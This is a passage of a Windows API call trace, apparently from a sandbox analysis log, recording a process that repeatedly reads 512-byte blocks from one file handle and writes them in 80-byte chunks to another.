WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] GetFileType (hFile=0x50) returned 0x1 [0216.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.953] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.954] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.954] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.954] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.954] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] GetFileType (hFile=0x50) returned 0x1 [0216.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.955] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.956] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.956] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.956] GetFileType (hFile=0x50) returned 0x1 [0216.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] GetFileType (hFile=0x50) returned 0x1 [0216.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.957] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.958] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.958] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] GetFileType (hFile=0x50) returned 0x1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] GetFileType (hFile=0x50) returned 0x1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] GetFileType (hFile=0x50) returned 0x1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.958] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] GetFileType (hFile=0x50) returned 0x1 [0216.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.959] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.959] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.960] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] GetFileType (hFile=0x50) returned 0x1 [0216.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.960] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] GetFileType (hFile=0x50) returned 0x1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] GetFileType (hFile=0x50) returned 0x1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.961] GetFileType (hFile=0x50) returned 0x1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.961] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.962] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.963] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.964] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.965] ReadFile (in: hFile=0x58, 